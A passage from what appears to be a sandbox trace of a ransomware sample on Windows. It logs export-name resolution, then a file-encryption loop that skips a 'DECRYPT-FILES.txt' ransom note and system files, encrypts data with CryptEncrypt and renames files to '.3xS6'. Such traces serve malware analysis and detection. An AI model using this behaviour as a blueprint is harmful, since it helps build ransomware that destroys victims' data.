lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0077.440] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0077.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0077.440] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0077.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0077.440] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0077.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0077.440] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0077.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0077.441] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0077.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0077.441] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0077.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0077.441] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0077.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0077.441] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0077.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0077.441] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0077.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0077.441] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0077.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0077.441] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0077.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0077.441] lstrlenA (lpString="CREATETHREAD") returned 12 [0077.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0077.441] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0077.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0077.441] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0077.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0077.441] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0077.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0077.441] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0077.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0077.441] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0077.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0077.441] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0077.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0077.441] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0077.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0077.441] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0077.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0077.441] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0077.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0077.441] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0077.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0077.441] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0077.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0077.442] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0077.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0077.442] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0077.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0077.442] lstrlenA (lpString="CTRLROUTINE") returned 11 [0077.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0077.442] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0077.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0077.442] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0077.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0077.442] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0077.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0077.442] lstrlenA (lpString="DEBUGBREAK") returned 10 [0077.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0077.442] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0077.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0077.442] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0077.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0077.442] lstrlenA (lpString="DECODEPOINTER") returned 13 [0077.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0077.442] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0077.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0077.442] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0077.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0077.442] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0077.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0077.442] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0077.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0077.442] lstrlenA (lpString="DELETEATOM") returned 10 [0077.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0077.442] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0077.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0077.442] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0077.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0077.442] lstrlenA (lpString="DELETEFIBER") returned 11 [0077.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0077.443] lstrlenA (lpString="DELETEFILEA") returned 11 [0077.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0077.443] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0077.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0077.443] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0077.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0077.443] lstrlenA (lpString="DELETEFILEW") returned 11 [0077.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0077.443] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0077.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0077.443] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0077.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0077.443] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0077.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0077.443] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0077.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0077.443] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0077.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0077.443] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0077.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0077.443] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0077.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0077.443] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0077.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0077.443] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0077.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0077.443] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0077.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0077.443] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0077.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0077.443] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0077.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0077.443] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0077.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0077.443] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0077.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0077.443] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0077.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0077.444] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0077.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0077.444] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0077.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0077.444] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0077.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0077.444] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0077.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0077.444] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0077.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0077.444] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0077.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0077.444] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0077.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0077.444] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0077.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0077.444] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0077.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0077.444] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0077.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0077.444] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0077.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0077.444] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0077.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0077.444] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0077.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0077.444] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0077.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0077.444] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0077.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0077.444] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0077.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0077.444] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0077.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0077.444] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0077.444] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0077.445] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0077.445] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 183 [0077.445] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.3xS6") returned 188 [0077.445] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.3xS6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.3xs6"), dwFlags=0x0) returned 1 [0077.445] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.446] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.446] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.446] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa563120, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa563120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa563120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.446] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.446] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xb0aa1fc0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb0aa1fc0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0aa1fc0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", cAlternateFileName="FDA992~1")) returned 1 [0077.446] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="DECRYPT-FILES.txt") returned 1 [0077.446] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="autorun.inf") returned 1 [0077.446] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="boot.ini") returned 1 [0077.446] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="desktop.ini") returned 1 [0077.446] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="ntuser.dat") returned -1 [0077.446] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="iconcache.db") returned -1 [0077.446] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="bootsect.bak") returned 1 [0077.446] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="ntuser.dat.log") returned -1 [0077.446] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="thumbs.db") returned -1 [0077.446] lstrcmpiW (lpString1="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Bootfont.bin") returned 1 [0077.446] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 114 [0077.446] lstrlenW (lpString="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 69 [0077.446] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0077.447] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" [0077.447] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.447] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0077.448] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=61) returned 1 [0077.448] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0077.448] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0077.448] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0077.448] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0077.448] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.449] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0077.450] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0077.450] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.451] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0077.451] CloseHandle (hObject=0x464) returned 1 [0077.451] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.451] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0077.452] CloseHandle (hObject=0x0) returned 0 [0077.452] CloseHandle (hObject=0x460) returned 1 [0077.452] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.453] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.453] GetTickCount () returned 0x114bdf3 [0077.453] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, 